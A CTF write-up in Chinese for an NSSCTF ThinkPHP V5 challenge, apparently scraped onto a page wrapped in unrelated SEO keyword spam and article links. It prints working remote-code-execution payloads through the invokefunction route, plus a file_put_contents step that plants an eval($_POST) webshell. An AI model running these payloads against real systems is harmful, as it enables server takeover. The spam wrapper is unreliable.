当前位置: 首页 > news >正文

网站的美观性济南信息化网站

网站的美观性,济南信息化网站,网络推广运营途径,wordpress homeslide打开题目就在线环境,发现只有一句话:真的什么都没有吗 F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到: 然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到: …

打开题目就在线环境,发现只有一句话:真的什么都没有吗
F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到:
在这里插入图片描述
然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到:
在这里插入图片描述
然后访问:/NSS/index.php/
在这里插入图片描述
这里直接搜索ThingkPHP V5就能得到这个漏洞复现的方法,我就是根据搜索到的帖子的漏洞复现方法跟着做的。

payload:?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

在这里插入图片描述

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>(将php代码写入shell.php)

在这里插入图片描述
再访问/NSS/shell.php
在这里插入图片描述
然后再
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>(删除/shell.php替换)

在这里插入图片描述
最后蚁剑连接,网址:http://node5.anna.nssctf.cn:22775/NSS/shell.php
密码为1
最后flag的路径为:/nss/ctf/flag
在这里插入图片描述

http://www.sczhlp.com/news/141663/

相关文章:

  • 莘县网站建设广州国创建设工程有限公司怎么样
  • 河北住建城乡建设网站电子商务网站设计的认识
  • 装修网站排名前十名网站怎么做域名解析
  • 上海市建设交通工会网站龙岗在线网站制作
  • 平台网站有哪些中国建设会计网站
  • 建筑工地网站wordpress 导航文字图片
  • heritrix做网站哈尔滨网站设计人
  • 网站规划文档广州大厂有哪些
  • 建设厅网站的无法打印360搜索引擎推广
  • 9月27日
  • 配置RedisTemplate序列化机制
  • 优化器(Optimizer)
  • 网页设计网站哪个公司好网站访问量大 处理
  • 一个网站做多少内链合适手机app ui设计在线网站
  • 专业微信网站建设多少钱搭建自己的个人网站
  • 网站开发人员定罪案例高端网站建设信息
  • 工业设备网站源码南宁个人网站建设
  • 建设银行网站登不上wordpress设置网站地址
  • 免费建微网站四川省住房和城乡建设厅网站下载
  • 做网站公司好开吗东莞网络推广及优化
  • 南宁网站建设策划方案搜房网网站跳出率
  • 360网站挂马检测百度如何建网站群
  • 衡水网站检测公司青岛开发区 网站建设
  • 2025 年气动离合器品牌推荐排行榜发布,聚焦博得 PLC 控制技术与降本优势,常开式气动离合器,多片式气动离合器,气动离合器电磁阀,气动离合器气缸,单片式气动离合器工厂推荐
  • Kubernetes Ingress与OpenShift Router的比较分析
  • 网站建设公司的市场营销方案模板虚拟主机搭建多个网站
  • 怎么做网站模块适合ps新手兼职
  • 企业在阿里云做网站优化关键词排名seo
  • 东莞住建局官网网站西宁网站建设优化案例
  • 网站开发需要的技术人员有什么软件磐安建设局网站